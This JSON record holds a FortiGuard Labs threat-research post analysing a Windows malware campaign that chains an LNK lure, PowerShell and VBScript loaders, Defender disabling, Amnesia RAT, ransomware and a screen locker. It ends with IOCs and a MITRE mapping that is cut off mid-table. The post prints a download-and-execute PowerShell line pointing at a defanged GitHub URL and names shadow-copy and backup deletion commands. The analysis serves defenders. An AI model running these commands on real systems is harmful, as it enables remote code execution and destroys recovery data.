{
	"id": "a943a4c2-b86e-495f-b270-4b8ea205c9a4",
	"created_at": "2026-04-06T00:12:14.61552Z",
	"updated_at": "2026-04-10T03:37:09.073421Z",
	"deleted_at": null,
	"sha1_hash": "77ac3aedd3c7b2af04248a1fa0dadec071c5ebd3",
	"title": "Inside a Multi-Stage Windows Malware Campaign | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 11330600,
	"plain_text": "Inside a Multi-Stage Windows Malware Campaign | FortiGuard\r\nLabs\r\nBy Cara Lin\r\nPublished: 2026-01-20 · Archived: 2026-04-05 15:03:21 UTC\r\nAffected Platforms: Microsoft Windows\r\nImpacted Users: Microsoft Windows\r\nImpact: Widespread file encryption. Stolen data may be leveraged for follow-on attacks\r\nSeverity Level: High\r\nBackground\r\nFortiGuard Labs recently identified a multi-stage malware campaign primarily targeting users in Russia. The\r\nattack begins with social engineering lures delivered via business-themed documents crafted to appear routine and\r\nbenign. These documents and accompanying scripts serve as visual distractions, diverting victims to fake tasks or\r\nstatus messages while malicious activity runs silently in the background.\r\nAs the attack chain progresses, it escalates into a full-system compromise that includes security-control bypass,\r\nsurveillance, system restriction, deployment of Amnesia RAT, and ransomware delivery. A defining characteristic\r\nof this campaign is the operational abuse of Defendnot, a research tool originally designed to demonstrate\r\nweaknesses in the Windows Security Center trust model. In this campaign, Defendnot is repurposed to disable\r\nMicrosoft Defender.\r\nThe threat actors further increase resilience by separating payload hosting across multiple public cloud services.\r\nGitHub is primarily used to distribute scripts, while Dropbox hosts binary payloads. This modular hosting\r\napproach allows attackers to update or rotate components independently, complicates takedown efforts, and helps\r\nmalicious traffic blend into legitimate enterprise network activity. 
This blog details each stage of the attack chain\r\nand the techniques used to sustain and escalate the intrusion.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 1 of 29\n\nFigure 1: Attack chain\r\nInitial Infection Vector and Social Engineering\r\nThe infection chain begins with a compressed archive delivered to the victim. The archive contains multiple decoy\r\ndocuments crafted to resemble legitimate business and accounting materials. These include text files and\r\nspreadsheets with Russian-language filenames referencing routine financial and reporting tasks, reinforcing the\r\nappearance of normal workplace activity.\r\nFigure 2: Archive contents used as social-engineering decoys\r\nThe primary malicious file within the archive is the LNK shortcut\r\nЗадание_для_бухгалтера_02отдела.txt.lnk\r\n(Assignment_for_accountant_02department.txt.lnk).\r\nThe filename is intentionally constructed to appear as a standard text document associated with accounting\r\nworkflows, thereby increasing the likelihood of user interaction.\r\nWhen executed, the LNK file launches PowerShell as the initial execution vector using the following parameters:\r\nRelative Path:\r\n..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nWorking Directory:\r\nC:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\r\nArguments:\r\n-ExecutionPolicy Bypass -Command \"irm\r\n'hxxps://github[.]com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira[.]ps1' | iex\"\r\nNo exploit or vulnerability is leveraged at this stage. Instead, the attack relies entirely on user execution, a\r\ntechnique that remains highly effective in enterprise environments where document sharing and archive extraction\r\nare routine. 
Using an execution policy bypass allows the script to run without local PowerShell policy\r\nenforcement.\r\nOnce launched, the downloaded PowerShell script (kira.ps1) functions as a first-stage loader. Its role is to\r\nestablish initial foothold activity, prepare the system environment, and transition execution to subsequent stages of\r\nthe attack chain.\r\nStage One Loader: PowerShell Script Execution\r\nThe kira.ps1 script does not deliver the final payload. Instead, it performs a series of preparatory actions intended\r\nto conceal malicious execution and reduce user suspicion during the early stages of compromise.\r\nThe script first suppresses visible execution by programmatically hiding the PowerShell console window. This\r\nremoves any immediate visual indicators that a script is running. It then generates a decoy text document in the\r\nuser’s local application data directory. The document contains detailed accounting and reporting instructions\r\nwritten in Russian, closely aligned with the filenames and themes used in the initial archive.\r\nFigure 3: Creation of decoy text file used for user distraction\r\nOnce written to disk, the decoy document is automatically opened. This reinforces the appearance of a legitimate\r\nbusiness task and keeps the user engaged while malicious activity continues in the background. After establishing\r\nthis distraction, the script sends an execution confirmation to the attacker using the Telegram Bot API. The\r\nmessage includes user-context information, allowing the attacker to verify that the initial stage has been executed\r\nsuccessfully on a live system.\r\nFollowing a deliberate delay of 444 seconds, kira.ps1 retrieves an obfuscated VBScript payload from a GitHub\r\nrepository. 
The script is executed via Windows Script Host in a hidden window, ensuring that no visible execution\r\nartifacts are created.\r\nFigure 4: Telegram notification and secondary script deployment\r\nBy offloading all core malicious functionality to externally hosted scripts, kira.ps1 remains lightweight and\r\nmodular. This design allows attackers to update or replace downstream payloads without modifying the initial\r\nloader, while also reducing the static footprint of the first-stage script.\r\nStage Two Orchestrator: Obfuscated VBScript\r\nThe stage-two payload, SCRRC4ryuk.vbe, is written to disk in a fully encoded form generated using Script\r\nEncoder Plus. In its stored state, the file bears no resemblance to readable VBScript. Instead, it begins with a\r\ndense sequence of nonstandard characters and control markers characteristic of Script Encoder Plus output,\r\nfollowed by an embedded encoder banner and seed values.\r\nFigure 5: Encoded VBScript payload generated by Script Encoder Plus\r\nAfter decoding the outer obfuscation layer, analysis indicates that SCRRC4ryuk.vbe serves as the central\r\norchestrator of the attack chain. Rather than executing a single malicious action directly, the script dynamically\r\nreconstructs the next execution stage entirely in memory.\r\nThe core payload is embedded across multiple string variables, typically labeled Part1 and Part2. These\r\nfragments are concatenated at runtime and passed through a custom decoding routine. 
The script implements a\r\nlayered decoding process that first applies Base64 decoding and then decrypts the resulting byte stream with RC4.\r\nOnce decrypted, the byte data is converted into Unicode text and executed dynamically using the ExecuteGlobal\r\nfunction.\r\nFigure 6: Runtime reconstruction and execution of the decoded payload\r\nThis layered design ensures that the final malicious logic is never written to disk in cleartext and only materializes\r\nbriefly during execution. By combining commercial script encoding for the outer layer with custom cryptographic\r\nroutines for payload reconstruction, the attacker significantly reduces opportunities for static detection and\r\nsignature-based analysis.\r\nThe following sections break down the internal logic of this VBScript and the subsequent stages it deploys.\r\nFinal Stage: Core Object Initialization and Execution\r\nThe final-stage script begins by explicitly initializing a set of core COM objects, including WScript.Shell,\r\nScripting.FileSystemObject, and WMI providers. These objects are reused throughout the remaining execution\r\nphases and form the foundation for process creation, file operations, and system interrogation.\r\nBefore performing any destructive or persistent actions, the script verifies that it is running with administrative\r\nprivileges. To do so, it attempts to create a batch file named test.bat in the C:\\Windows\\System32\\ directory.\r\nBecause this directory is protected by the operating system, a successful write operation indicates that the process\r\nis executing with elevated rights.\r\nIf file creation fails, the script assumes insufficient privileges and enters a persistent User Account Control (UAC)\r\nescalation loop. 
During this loop, the script repeatedly relaunches itself via ShellExecute with the runas verb,\r\nprompting the operating system to display a UAC dialog.\r\nTo detect whether elevated privileges have been granted, the script pauses for 3,000 milliseconds between\r\nattempts and queries active processes through WMI, specifically checking for the presence of cmd.exe. The\r\nappearance of a command shell process is treated as a signal that privilege elevation has succeeded. Once\r\ndetected, the script exits the escalation loop and terminates any remaining command shell processes to minimize\r\nvisible artifacts.\r\nIf the initial attempt to write test.bat to the system directory succeeds without error, the script concludes that\r\nadministrative privileges are present. It then writes a confirmation message to the batch file and executes it\r\ndirectly, entirely bypassing the escalation logic.\r\nFigure 7: Administrative privilege verification and UAC escalation logic\r\nOnce the execution environment is fully prepared, the script transitions into its final operational phase. From this\r\npoint forward, execution is structured around four primary objectives, each implemented through multiple\r\ncomplementary techniques and payloads. These objectives are detailed in the following sections.\r\nPhase 1: Defensive Neutralization and Evasion\r\nThis phase focuses on suppressing visibility into security controls and neutralizing endpoint protection\r\nmechanisms before deploying high-impact payloads.\r\n1. Fake Update Download and Decoy Execution\r\nThe script initiates a decoy execution stage designed to occupy the victim’s attention and simulate legitimate\r\nsystem activity. It first queries running processes via WMI to determine whether a process named install.exe is\r\nalready active. 
This check prevents redundant execution of the decoy component.\r\nIf no existing instance is detected, the script downloads an executable from a public GitHub repository:\r\nhxxps://github[.]com/Mafin111/MafinREP111/raw/refs/heads/main/install[.]exe\r\nand saves it to %PROGRAMDATA%\\install.exe.\r\nThe downloaded file is a .NET-based executable designed solely as a visual decoy. When launched, it displays a\r\nWindows Forms interface titled “Microsoft® Windows Based Script Host,” deliberately mimicking a legitimate\r\nWindows utility. The application uses a fixed-size dialog, centers itself on the screen, and applies an icon extracted\r\nfrom the legitimate wscript.exe binary to reinforce authenticity.\r\nNo functional logic is executed within this component. While the decoy window remains visible in the\r\nforeground, all malicious activity continues silently in the background.\r\nFigure 8: Fake update executable used as a visual decoy\r\n2. Detection Evasion\r\nAfter deploying the decoy, the script transitions into a dedicated detection-evasion phase that systematically\r\ndisables Microsoft Defender before introducing high-risk payloads.\r\nThe process begins with runtime configuration changes executed through PowerShell. The script explicitly\r\ndisables Microsoft Defender real-time monitoring, preventing on-access scanning of files and processes. To\r\nfurther weaken detection coverage, it adds multiple filesystem exclusions using Defender’s native preference\r\ninterface. 
These exclusions target directories commonly used for payload staging and execution, including\r\nProgramData, Program Files, Desktop, Downloads, and the system temporary directory.\r\nBy excluding these locations, the script ensures that files written and executed during later stages fall outside\r\nDefender’s scanning scope.\r\nFigure 9: Modification of Windows Defender scan preferences\r\nThe script then disables additional Defender protection components individually using a sequence of PowerShell\r\ncommands. Each command targets a specific capability, including behavior monitoring, block-at-first-seen\r\nprotection, IOAV scanning, archive scanning, script scanning, removable media scanning, email scanning,\r\nintrusion prevention features, and scheduled catch-up scans. Commands are executed sequentially with short\r\ndelays to prevent partial failures from interrupting the process.\r\nFigure 10: Sequential disabling of Defender protection features\r\nTo enforce long-term suppression, the script writes multiple policy-controlled registry values under\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender. These entries disable core antivirus and antispyware\r\nfunctionality, including real-time protection, behavior analysis, on-access scanning, archive inspection, and scan-on-enable enforcement. Defender reporting and user experience policies are also modified to suppress notification\r\nprompts, ensuring that the user receives no visible indication that protection has been disabled.\r\nFigure 11: Registry-based enforcement of Defender suppression\r\n3. 
Security Control Bypass via Defendnot Deployment\r\nThe script then proceeds to a dedicated security-control bypass stage by deploying Defendnot, a tool that disables\r\nMicrosoft Defender by exploiting the Windows Security Center trust model rather than terminating Defender\r\ncomponents directly.\r\nThe script downloads the Defendnot DLL and loader from GitHub and writes them to\r\n%PROGRAMDATA%\\defendnot.dll and %PROGRAMDATA%\\defendnot-loader.exe.\r\nThe loader injects the Defendnot DLL into the Microsoft-signed, trusted system process Taskmgr.exe by default.\r\nFrom within this trusted execution context, the DLL registers a fake antivirus product with the Windows Security\r\nCenter interface. This registration triggers standard Windows behavior, causing Microsoft Defender to\r\nautomatically disable itself to avoid conflicts with the newly registered antivirus.\r\nThis technique exploits trust assumptions embedded in the Windows Security Center design, where antivirus\r\nproducts registered through approved interfaces are treated as authoritative.\r\nFigure 12: The download and deployment of Defendnot components\r\nPhase 2: Environment Reconnaissance and Surveillance\r\nFollowing defensive neutralization, the attack transitions into environment reconnaissance and active user\r\nsurveillance.\r\n1. System Information Collection and Telegram Exfiltration\r\nAfter privilege enforcement and environment preparation are complete, the script enters a dedicated phase for\r\ncollecting system information. 
The explicit objective of this stage is to gather detailed host, hardware, user,\r\nnetwork, and security-related information and transmit it to the attacker via the Telegram Bot API.\r\nCollected data includes system identifiers, user context, domain membership, and other environment attributes\r\nrelevant for profiling the compromised host and guiding subsequent attacker actions. Once assembled, the data is\r\ntransmitted directly to the attacker-controlled Telegram bot endpoint, providing near-real-time confirmation of\r\nsuccessful compromise and situational awareness of the victim’s environment.\r\nFigure 13: Transmission of collected system information via Telegram\r\n2. User Activity Surveillance via Screenshot Capture\r\nAfter completing detection-evasion measures, the attack initiates active visual monitoring of user activity over a\r\nfixed observation window. The script retrieves an additional payload from the same GitHub repository,\r\nhxxps://github[.]com/Mafin111/MafinREP111/raw/refs/heads/main/TelegramWorker[.]scr, and writes it to\r\n%PROGRAMDATA%\\TelegramWorker.scr.\r\nUsing the .scr extension causes Windows to treat the file as a screen saver executable, reducing user suspicion\r\nduring execution. Despite the extension, TelegramWorker.scr is a .NET-based executable that functions as a\r\ndedicated surveillance module.\r\nUpon execution, the module retrieves its own process name and queries the system for other running instances\r\nwith the same name. If more than one instance is detected, execution terminates immediately. This single-instance\r\nenforcement prevents redundant execution and avoids overlapping screenshot capture.\r\nThe module then enters a capture loop with a limit of 30 iterations. During each iteration, it constructs a local file\r\npath using a predefined directory and sequential filenames (for example, 1.png, 2.png). The current screen\r\ncontents are captured and written to disk at the generated path. 
Each image is then transmitted to the attacker via\r\nthe Telegram Bot API, enabling near real-time observation of user activity.\r\nA fixed delay of thirty seconds is enforced between captures, resulting in a total surveillance window of\r\napproximately fifteen minutes.\r\nFigure 14: Screenshot capture and exfiltration component\r\nPhase 3: System Lockdown and Response Suppression\r\nTo prevent remediation, investigation, or recovery, the malware transitions into a comprehensive system lockdown\r\nphase that strips the victim of administrative control and recovery options.\r\n1. System Tool Restriction and Recovery Destruction\r\nThe script disables a broad set of Windows administrative and diagnostic tools by modifying registry-based policy\r\ncontrols rather than terminating services or altering binaries. This approach leverages native Windows policy\r\nenforcement mechanisms, ensuring changes take effect immediately and persist across sessions.\r\nUser-facing tools explicitly disabled include:\r\nRegistry Editor, preventing inspection or reversal of registry-based persistence and policy changes\r\nTask Manager, blocking process visibility and termination\r\nRun dialog, restricting command execution\r\nFolder Options, preventing access to hidden files and file extensions\r\nSystem Settings and Control Panel, blocking access to core configuration interfaces\r\nSystem configuration utilities (for example, msconfig), preventing inspection of startup behavior,\r\nservices, and boot options\r\nSystem properties and context menus, limiting access to system-level dialogs and right-click\r\nadministrative shortcuts\r\nLegacy execution pathways, reducing alternative diagnostic or recovery options\r\nAll policy values are written under\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\\r\nBy targeting the current user hive, the restrictions apply 
immediately without requiring system-wide policy\r\ndeployment. After writing the registry values, the script forces policy application by executing gpupdate /force,\r\nensuring the changes take effect without waiting for the next refresh cycle.\r\nWith administrative access effectively disabled, the script then disables system recovery mechanisms. It first\r\ndisables the Windows Recovery Environment using reagentc /disable, preventing access to boot-time repair and\r\nreset options. It then deletes the Windows Backup catalog using wbadmin delete catalog -quiet, rendering\r\nexisting backup references unusable. Finally, all Volume Shadow Copy Service snapshots are removed using\r\nvssadmin delete shadows /all /quiet, permanently eliminating restore points and file version history.\r\nAll recovery-disabling commands are executed silently through cmd.exe, suppressing output to avoid alerting the\r\nuser.\r\nFigure 15: Registry-based restriction of system administration tools\r\n2. File Association Hijacking and Execution Control\r\nIn the final stage of the attack chain, the malware implements an extensive file association hijacking mechanism to\r\nprevent the victim from launching applications or opening common file types. Rather than deleting files or\r\nterminating processes, the script exploits Windows file association behavior in the registry to intercept execution\r\nattempts.\r\nThe script defines a comprehensive list of file extensions, including executable, document, archive, image, media,\r\nscript, installer, and configuration formats. For each extension, it overwrites the default open command under the\r\nHKCR registry hive. 
Instead of invoking the associated application, opening these files launches a command shell\r\nthat displays a message instructing the victim to contact the attacker via Telegram.\r\nThis approach disables application execution without modifying or corrupting the underlying files. From the\r\nuser’s perspective, files appear intact but are functionally unusable, reinforcing the perception of complete system\r\ncompromise.\r\nFigure 16: Registry-based blocking of application and document execution\r\nWhile broadly restricting execution, the script explicitly preserves functionality for malicious script formats. File\r\nassociations for .vbs (VBScript) and .scr (Screen Saver) files are deliberately configured to ensure reliable\r\nexecution. The registry mappings explicitly bind .vbs files to WScript.exe or CScript.exe, preventing accidental\r\nopening in text editors or interference from default security associations.\r\nThe .scr extension, which is functionally equivalent to .exe, is configured with an “%1 /S” execution command to\r\nensure it runs as an executable. To immediately apply all association changes, the script runs regsvr32 /s /i\r\nshell32.dll, which forces the Windows Shell to refresh its configuration without requiring a reboot.\r\nThis guarantees that any subsequently deployed payloads execute immediately when accessed, while legitimate\r\nuser workflows remain blocked.\r\nFigure 17: File association manipulation to enforce execution control\r\nPhase 4: Final Payload Impact\r\nWith security controls disabled, surveillance established, and recovery mechanisms removed, the malware deploys\r\nits final payloads. 
This phase combines persistent remote access, large-scale data theft, ransomware encryption,\r\nand full system lockout to maximize operational impact and coercive leverage.\r\n1. Amnesia RAT Deployment\r\nThe VBScript deploys a Remote Access Trojan as its primary long-term control and data-exfiltration component.\r\nThis payload is hosted on Dropbox rather than GitHub and is downloaded with the deceptive filename\r\n“svchost.scr”. The file is copied to %PROGRAMDATA% and the user’s Startup folder, and persistence is\r\nestablished via a registry entry under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.\r\nFigure 18: Deployment of the RAT payload\r\nStatic analysis shows that svchost.scr is a 64-bit PE executable compiled with Microsoft Visual C++ and\r\npackaged using PyInstaller. Unpacking reveals multiple potential entry points, including a compiled Python\r\nmodule named amnesiarat1.pyc, indicating that the core functionality is implemented as an obfuscated Python-based Amnesia RAT.\r\nFigure 19: Partial strings extracted from svchost.scr\r\nAmnesia RAT is designed for broad, multi-category data theft combined with real-time surveillance and system\r\ncontrol. Its capabilities include:\r\nBrowser credentials and session data: The RAT targets Chromium-based browsers, including Chrome, Edge,\r\nChromium, Brave, Opera, Opera GX, Vivaldi, and Yandex. It extracts saved passwords, cookies, session tokens,\r\nbrowsing history, download records, and autofill data. 
Encrypted credentials are decrypted by retrieving the\r\nbrowser master key from the Local State file and invoking Windows DPAPI to recover plaintext secrets.\r\nTelegram Desktop session hijacking: The malware explicitly targets Telegram Desktop by stealing local session\r\nartifacts from the tdata directory, including authentication keys, session files, configuration data, and account\r\nmetadata. These artifacts enable full account takeover without credentials or two-factor authentication.\r\nSeed phrase discovery and clipboard monitoring: The RAT recursively scans accessible drives for text files\r\ncontaining any of the 2,048 BIP-39 seed words. In parallel, it monitors clipboard contents in real time to intercept\r\n12-, 18-, or 24-word recovery phrases.\r\nDiscord and Steam data theft: The RAT searches for Discord authentication tokens stored by both standalone\r\napplications and browsers, parsing LevelDB and Local Storage files using regex patterns applied to .log and .ldb\r\nfiles. It also targets Steam configuration files and ssfn authentication files.\r\nCryptocurrency wallets and financial assets: Hard-coded checks target specific browser extensions associated\r\nwith MetaMask as well as desktop wallets including Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum,\r\nAtomic Wallet, Guarda, and Coinomi.\r\nSystem and hardware intelligence: The RAT collects detailed host profiling data, including operating system\r\nversion, username, domain, CPU model, RAM capacity, GPU model, BIOS version, motherboard identifier, disk\r\ncapacity, and local and external IP addresses. This data supports victim fingerprinting and prioritization.\r\nScreen, audio, and activity surveillance: Supported surveillance features include screenshot capture, webcam\r\nimage capture, microphone audio recording, clipboard monitoring, and active window title enumeration. 
Collected\r\nartifacts are staged in C:\\ProgramData before compression and exfiltration.\r\nProcess and system control: The RAT enables full remote interaction, including process enumeration and\r\ntermination, shell command execution, arbitrary payload deployment, and execution of additional malware.\r\nPersistence: Persistence is reinforced through registry autorun entries, often using benign-sounding names such\r\nas chromeupdate to evade casual inspection.\r\nExfiltration channels: Exfiltration is primarily performed over HTTPS using Telegram Bot APIs. Larger datasets\r\nmay be uploaded to third-party file-hosting services such as GoFile, with download links relayed to the attacker\r\nvia Telegram. This design eliminates the need for attacker-controlled infrastructure.\r\nBy combining credential theft, session hijacking, financial targeting, and real-time surveillance, Amnesia RAT\r\nenables full account takeover, identity abuse, and follow-on compromise campaigns.\r\nFigure 20: Amnesia RAT public-facing reference site\r\n2. Ransomware Deployment\r\nFollowing RAT deployment, the script downloads and executes an additional payload, WmiPrvSE.scr, from a\r\nremote GitHub repository. Execution is gated by an administrative privilege check and launched in a hidden\r\nwindow via PowerShell. Persistence is reinforced by copying the payload into the Startup folder.\r\nFigure 21: Deployment of the ransomware payload\r\nThe WmiPrvSE.scr payload represents the ransomware stage and is derived from the Hakuna Matata\r\nransomware family. 
Once executed, it performs large-scale encryption across the system, targeting hundreds of\r\nfile extensions spanning documents, archives, images, media, source code, and application assets.\r\nFigure 22: Hakuna Matata ransomware execution\r\nEncrypted files are renamed with the custom extension @NeverMind12F. The ransomware drops a ransom note\r\nnamed ЧИТАЙМЕНЯ.txt into affected directories and replaces the desktop wallpaper with a ransom image\r\ngenerated on the fly. To increase impact, it terminates processes associated with databases, office software, email\r\nclients, virtualization platforms, and security tools before rescanning and encrypting remaining files.\r\nFigure 23: Targeted process termination and encryption\r\nThe ransomware maintains a continuous execution loop that actively monitors and hijacks clipboard contents,\r\nreplacing cryptocurrency wallet addresses with attacker-controlled values. Combined with encryption, lockout\r\nmechanisms, and coercive visual messaging, these behaviors demonstrate an attack model built for maximum\r\nleverage, sustained control, and financial extraction.\r\nFigure 24: ClipBanker functionality in Hakuna Matata ransomware\r\nFigure 25: Ransomware wallpaper payload\r\n3. WinLocker Deployment\r\nIn parallel, the script deploys a WinLocker component designed to fully restrict user interaction. The payload is\r\ndownloaded from GitHub and saved as %PROGRAMDATA%\\gedion.scr. As with prior stages, execution requires\r\nadministrative privileges and is launched in a hidden window.\r\nOnce executed, the WinLocker creates a mutex named WINLOCKBYAMPBYAMPBYAMPfsdjf and enforces a\r\nfull desktop lock, preventing normal system access. 
Victim-facing messages are embedded as Base64-encoded\r\nstrings and decoded at runtime. These messages, written in Russian, instruct the victim to contact the attacker via\r\nTelegram within a two-hour deadline.\r\nThis lightweight obfuscation reduces static detection while ensuring consistent messaging across the ransomware\r\nnotes, the WinLocker interface, wallpaper overlays, and file-association hijacking routines.\r\nFigure 26: WinLocker interface enforcing system lockout\r\nConclusion\r\nThis attack chain demonstrates how modern malware campaigns can achieve full system compromise without\r\nexploiting software vulnerabilities. Instead, the threat actor relies on social engineering, widely trusted platforms\r\nsuch as GitHub and Dropbox, and the abuse of legitimate operating system functionality to stage, deliver, and\r\nexecute payloads while blending into normal enterprise traffic.\r\nBy systematically abusing native Windows features, administrative tools, and policy enforcement mechanisms, the\r\nattacker disables endpoint defenses before deploying persistent surveillance tooling and destructive payloads. The\r\noperational use of Defendnot highlights how publicly disclosed defensive research can be repurposed into active\r\nattack workflows by exploiting trust assumptions embedded within the Windows Security Center. In parallel,\r\ndeploying Amnesia RAT enables long-term reconnaissance, credential theft, and interactive system control, while\r\nsubsequent ransomware and WinLocker components enforce data denial and apply sustained psychological\r\npressure on the victim.\r\nThis campaign underscores the importance of monitoring for anomalous security configuration changes,\r\nunexpected persistence mechanisms, and abuse of legitimate cloud services. 
Early detection of these behaviors is\r\ncritical, as once defensive controls are neutralized and recovery mechanisms are removed, remediation options\r\nbecome severely constrained and impact escalates rapidly.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 24 of 29\n\nFortinet Protections\r\nThe malware described in this report is detected and blocked by FortiGuard Antivirus as:\r\nLNK/Agent.LAZH!tr\r\nPowerShell/Agent.OQB!tr\r\nW64/NoDefender.E!tr\r\nMSIL/Agent.FLS!tr\r\nW32/LockScreen.BVN!tr\r\nMSIL/Filecoder.BBY!tr.ransom\r\nW64/Agent.5E79!tr\r\nThe FortiGuard AntiVirus service engine is integrated into FortiGate, FortiMail, FortiClient, and FortiEDR.\r\nCustomers running these products with up-to-date signatures are protected against the malware components\r\ndescribed in this report.\r\nFortiMail detects the initial phishing emails as virus detected. In addition, real-time anti-phishing protection\r\nprovided by FortiSandbox, embedded across Fortinet’s FortiMail, web filtering, and antivirus solutions, enables\r\nadvanced detection of both known and unknown phishing attempts. 
The FortiPhish phishing simulation service\r\nfurther supports user resilience by actively training and testing end users against real-world phishing techniques,\r\nincluding impersonation, Business Email Compromise (BEC), and ransomware delivery.\r\nThe FortiGuard CDR (Content Disarm and Reconstruction) service, available on both FortiGate and FortiMail,\r\ncan neutralize malicious content embedded in documents by removing active code while preserving document\r\nusability.\r\nThe FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks infrastructure associated with\r\nthis campaign by correlating malicious IP intelligence collected from Fortinet’s global sensor network, CERT\r\ncollaborations, MITRE, trusted industry partners, and other intelligence sources.\r\nOrganizations seeking to strengthen foundational security awareness may also consider completing Fortinet\r\nCertified Fundamentals (FCF) training in Cybersecurity.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, contact our Global\r\nFortiGuard Incident Response Team for assistance.\r\nIOCs\r\nURLs\r\nhxxps://github[.]com/Mafin111/MafinREP111\r\nhxxps://dl.dropboxusercontent.com/scl/fi/fvugw0l9x7ty665esaul3/svchost.scr?\r\nrlkey=urzegysuk9bkrw2b8zmx31457\u0026st=gbhmc2su\r\nLNK\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 25 of 
29\n\n7b8cf0ef390a7d6126c5e7bf835af5c5ce32c70c0d58ca4ddc9c238b2d3f059a\r\nScripts\r\n1828614be6d9bdd92f7ee30e12c8aac8eba33a6df2c92995f9bf930c3f1b992b\r\n3aa6ebb73390d304eef8fd897994906c05f3e967f8f6f6a7904c6156cf8819f9\r\n263b5ba921e478215dc9e3a397157badab415fc775cfb4681821b7446c14fb1a\r\n5443232a367a83ac2899b37c066dae3ec2010df292291db24ce3d744133218a6\r\nPayloads\r\n359fe8df31c903153667fbe93795929ad6172540b3ee7f9eff4bcc1da6d08478\r\n6222775b877b4be4f5407525d52c5889739b96c302e5a204ef369b4a51c6dab2\r\n71069a5d2a80a047ca36ca82e630d353829726d4f03a74c7522b7700c5c2bb59\r\n45e942ba59f3876b263a03ed7e5d5b1b250e84a0a4b4093b3c13b5fca4e12b21\r\ne6ca6bab85ae1eff08a59b46b7905ae0568110da172dec8367f32779094bdd08\r\n7de56603a7b41fca9313231df6105dbb8148d3b0d80dfbc00e71e1d88f871915\r\nMITRE ATT\u0026CK Mapping\r\nMITRE ATT\u0026CK techniques observed in this campaign map to the following:\r\nTactic\r\nTechnique\r\nID\r\nTechnique\r\nName\r\nObserved Behavior in This Campaign\r\nInitial\r\nAccess\r\nT1566.001\r\nPhishing:\r\nAttachment\r\nDelivery of malicious LNK and decoy documents inside a\r\ncompressed archive masquerading as business files\r\nExecution T1059.001\r\nCommand and\r\nScripting\r\nInterpreter:\r\nPowerShell\r\nPowerShell executed via LNK to download and execute\r\nstaged payloads\r\nExecution T1059.005\r\nCommand and\r\nScripting\r\nInterpreter:\r\nVBScript\r\nObfuscated VBScript used as an orchestration layer and\r\nloader\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 26 of 29\n\nDefense\r\nEvasion\r\nT1562.001\r\nImpair\r\nDefenses:\r\nDisable or\r\nModify Tools\r\nSystematic disabling of Microsoft Defender features via\r\nPowerShell and registry policy\r\nDefense\r\nEvasion\r\nT1562.004\r\nImpair\r\nDefenses:\r\nDisable or\r\nModify\r\nSystem\r\nFirewall / AV\r\nAbuse of Defendnot to disable Defender by registering a\r\nfake antivirus\r\nDefense\r\nEvasion\r\nT1027\r\nObfuscated /\r\nEncrypted\r\nFiles 
or\r\nInformation\r\nScript Encoder Plus, Base64, and RC4 used to conceal\r\npayload logic\r\nDefense\r\nEvasion\r\nT1218\r\nSigned Binary\r\nProxy\r\nExecution\r\nInjection of Defendnot into trusted Microsoft-signed\r\nprocess (Taskmgr.exe)\r\nPrivilege\r\nEscalation\r\nT1548.002\r\nAbuse\r\nElevation\r\nControl\r\nMechanism:\r\nBypass UAC\r\nRepeated ShellExecute “runas” invocation to force UAC\r\nelevation\r\nPersistence T1547.001\r\nBoot or Logon\r\nAutostart\r\nExecution:\r\nRegistry Run\r\nKeys\r\nAutorun persistence via\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nPersistence T1547.001 Boot or Logon\r\nAutostart\r\nPayloads copied to user Startup directory\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 27 of 29\n\nExecution:\r\nStartup Folder\r\nDiscovery T1082\r\nSystem\r\nInformation\r\nDiscovery\r\nCollection of OS, hardware, domain, and environment\r\ndetails\r\nDiscovery T1057\r\nProcess\r\nDiscovery\r\nEnumeration of running processes to control execution and\r\navoid duplication\r\nCollection T1113\r\nScreen\r\nCapture\r\nPeriodic screenshot capture via TelegramWorker.scr\r\nCollection T1056.001\r\nInput Capture:\r\nClipboard\r\nData\r\nClipboard monitoring for seed phrases and cryptocurrency\r\naddresses\r\nCredential\r\nAccess\r\nT1555\r\nCredentials\r\nfrom Password\r\nStores\r\nExtraction of browser credentials and session data using\r\nDPAPI\r\nCredential\r\nAccess\r\nT1539\r\nSteal Web\r\nSession\r\nCookie\r\nTheft of browser cookies and active session tokens\r\nCredential\r\nAccess\r\nT1098\r\nAccount\r\nManipulation\r\nTelegram Desktop session hijacking via stolen tdata\r\nartifacts\r\nCommand\r\nand Control\r\nT1102.002\r\nWeb Service:\r\nExternal Web\r\nServices\r\nTelegram Bot API used for C2 and data exfiltration\r\nCommand\r\nand Control\r\nT1071.001 Application\r\nLayer\r\nHTTPS-based communication to Telegram and 
